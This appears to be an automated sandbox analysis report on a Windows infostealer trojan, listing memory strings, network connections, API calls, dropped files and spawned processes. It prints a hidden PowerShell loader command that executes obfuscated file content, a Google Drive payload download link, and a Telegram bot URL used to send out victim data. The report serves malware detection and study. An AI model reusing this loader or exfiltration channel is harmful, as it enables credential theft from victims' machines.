Source: msiexec.exe, 00000004.00000002.2611051313.0000000023D5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: powershell.exe, 00000002.00000002.1736319849.00000000047D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.1736319849.0000000004925000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: msiexec.exe, 00000004.00000002.2609054481.0000000022B62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: msiexec.exe, 00000004.00000002.2609054481.0000000022B62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: msiexec.exe, 00000004.00000002.2609054481.0000000022B62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: msiexec.exe, 00000004.00000002.2609054481.0000000022B62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:928100%0D%0ADate%20a
Source: msiexec.exe, 00000004.00000003.1800996824.0000000007079000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1801091412.00000000070AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: msiexec.exe, 00000004.00000002.2611051313.0000000023D5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: msiexec.exe, 00000004.00000002.2611051313.0000000023BD5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2611051313.0000000023D96000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2611051313.0000000023D5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: msiexec.exe, 00000004.00000002.2611051313.0000000023BD5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2611051313.0000000023D96000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2611051313.0000000023D5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: msiexec.exe, 00000004.00000002.2609054481.0000000022C0E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2609054481.0000000022C3F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2609054481.0000000022BFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: msiexec.exe, 00000004.00000002.2609054481.0000000022C0E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enT
Source: msiexec.exe, 00000004.00000002.2609054481.0000000022C09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: powershell.exe, 00000002.00000002.1740283759.0000000005837000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1740283759.0000000005837000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1740283759.0000000005837000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 00000004.00000002.2594583004.0000000006FFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000004.00000002.2594583004.0000000006FFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/-
Source: msiexec.exe, 00000004.00000002.2594583004.0000000006FFA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2594974007.0000000007140000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1gmLqJmY2CK4V6PsKGMelJOUJTAS35IYR
Source: msiexec.exe, 00000004.00000002.2594583004.0000000007072000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000004.00000002.2594583004.0000000007072000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/Wa
Source: msiexec.exe, 00000004.00000003.1800996824.0000000007079000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2594583004.0000000007055000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1801091412.00000000070AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1gmLqJmY2CK4V6PsKGMelJOUJTAS35IYR&export=download
Source: msiexec.exe, 00000004.00000002.2611051313.0000000023D5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: msiexec.exe, 00000004.00000002.2611051313.0000000023BD5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2611051313.0000000023D96000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2611051313.0000000023D5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20-
Source: msiexec.exe, 00000004.00000002.2611051313.0000000023D5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: msiexec.exe, 00000004.00000002.2611051313.0000000023D5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: powershell.exe, 00000002.00000002.1736319849.0000000004925000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1742599713.0000000006EE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1740283759.0000000005837000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 00000004.00000002.2609054481.0000000022ACC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2609054481.0000000022B62000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2609054481.0000000022B3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: msiexec.exe, 00000004.00000002.2609054481.0000000022ACC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: msiexec.exe, 00000004.00000002.2609054481.0000000022B3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: msiexec.exe, 00000004.00000002.2609054481.0000000022AF6000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2609054481.0000000022B62000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2609054481.0000000022B3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: msiexec.exe, 00000004.00000003.1800996824.0000000007079000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1801091412.00000000070AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000004.00000002.2611051313.0000000023BD5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2611051313.0000000023D96000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2611051313.0000000023D5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: msiexec.exe, 00000004.00000003.1800996824.0000000007079000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1801091412.00000000070AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 00000004.00000003.1800996824.0000000007079000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1801091412.00000000070AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msiexec.exe, 00000004.00000002.2611051313.0000000023BD5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2611051313.0000000023D96000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2611051313.0000000023D5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: msiexec.exe, 00000004.00000003.1800996824.0000000007079000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1801091412.00000000070AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 00000004.00000003.1800996824.0000000007079000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1801091412.00000000070AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: msiexec.exe, 00000004.00000002.2609054481.0000000022C3F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2609054481.0000000022C30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: msiexec.exe, 00000004.00000002.2609054481.0000000022C3F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/T
Source: msiexec.exe, 00000004.00000002.2609054481.0000000022C3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702

Source: unknown	HTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.6:49690 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.6:49691 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49709 version: TLS 1.2

Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe

Code function: 0_2_00405339 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405339

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Nino\cqWZtEH4eJ.exe

Jump to dropped file

Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe

Code function: 0_2_00403325 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403325

Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	File created: C:\Windows\resources\0809	Jump to behavior
Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	File created: C:\Windows\resources\0809\Dkvingernes88	Jump to behavior
Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	File created: C:\Windows\resources\0809\Dkvingernes88\malaga	Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_02DED278	4_2_02DED278
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_02DE5370	4_2_02DE5370
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_02DEC147	4_2_02DEC147
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_02DEC738	4_2_02DEC738
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_02DEC468	4_2_02DEC468
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_02DECA08	4_2_02DECA08
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_02DEE988	4_2_02DEE988
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_02DE3E09	4_2_02DE3E09
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_02DECFAA	4_2_02DECFAA
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_02DECCD8	4_2_02DECCD8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_02DEA088	4_2_02DEA088
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_02DEF630	4_2_02DEF630
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_02DEFAF9	4_2_02DEFAF9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_02DE3AA1	4_2_02DE3AA1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_02DE29EC	4_2_02DE29EC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_02DE39ED	4_2_02DE39ED
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_02DEE97A	4_2_02DEE97A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_02DE6FC8	4_2_02DE6FC8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_06DB2EDC	4_2_06DB2EDC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_06DB5FA8	4_2_06DB5FA8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_06DBC950	4_2_06DBC950
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C41850	4_2_24C41850
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C48D88	4_2_24C48D88
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C496D0	4_2_24C496D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C423D0	4_2_24C423D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C4F8E8	4_2_24C4F8E8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C4F8F8	4_2_24C4F8F8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C40040	4_2_24C40040
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C41841	4_2_24C41841
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C4F44F	4_2_24C4F44F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C4F450	4_2_24C4F450
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C4D000	4_2_24C4D000
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C40011	4_2_24C40011
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C485F0	4_2_24C485F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C4D991	4_2_24C4D991
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C4D9A0	4_2_24C4D9A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C4D548	4_2_24C4D548
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C4D538	4_2_24C4D538
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C496C1	4_2_24C496C1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C4C6EF	4_2_24C4C6EF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C4E6E9	4_2_24C4E6E9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C4E6F8	4_2_24C4E6F8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C44A88	4_2_24C44A88
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C4E2A0	4_2_24C4E2A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C44A78	4_2_24C44A78
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C48600	4_2_24C48600
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C4DE10	4_2_24C4DE10
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C4DE20	4_2_24C4DE20
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C4EFE8	4_2_24C4EFE8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C4CFF0	4_2_24C4CFF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C4EFF8	4_2_24C4EFF8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C48FA8	4_2_24C48FA8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C4EB41	4_2_24C4EB41
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C4CB48	4_2_24C4CB48
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C4EB50	4_2_24C4EB50
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C4CB58	4_2_24C4CB58
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C4C700	4_2_24C4C700
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C40B20	4_2_24C40B20
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_24C40B30	4_2_24C40B30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_25216720	4_2_25216720
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_25216E90	4_2_25216E90
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_25216587	4_2_25216587
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_25216710	4_2_25216710
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_25214FCF	4_2_25214FCF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_25216E58	4_2_25216E58
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_25216E80	4_2_25216E80

Source: cqWZtEH4eJ.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/23@5/5

Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe

0_2_00403325

Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe

Code function: 0_2_004045EA GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_004045EA

Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe

Code function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,

0_2_0040216B

Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe

File created: C:\Users\user\AppData\Local\afsindigstes

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1196:120:WilError_03

Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe

File created: C:\Users\user\AppData\Local\Temp\nsp2A93.tmp

Jump to behavior

Source: cqWZtEH4eJ.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: msiexec.exe, 00000004.00000002.2609054481.0000000022D11000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2609054481.0000000022D04000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2609054481.0000000022CDD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2609054481.0000000022CCD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2609054481.0000000022CEB000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: cqWZtEH4eJ.exe	Virustotal: Detection: 70%
Source: cqWZtEH4eJ.exe	ReversingLabs: Detection: 57%

Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe

File read: C:\Users\user\Desktop\cqWZtEH4eJ.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\cqWZtEH4eJ.exe "C:\Users\user\Desktop\cqWZtEH4eJ.exe"
Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Formble=Get-Content -Raw 'C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Circumdenudation.Spi';$Riffelkuglens=$Formble.SubString(52868,3);.$Riffelkuglens($Formble) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Formble=Get-Content -Raw 'C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Circumdenudation.Spi';$Riffelkuglens=$Formble.SubString(52868,3);.$Riffelkuglens($Formble) "	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\cqWZtEH4eJ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
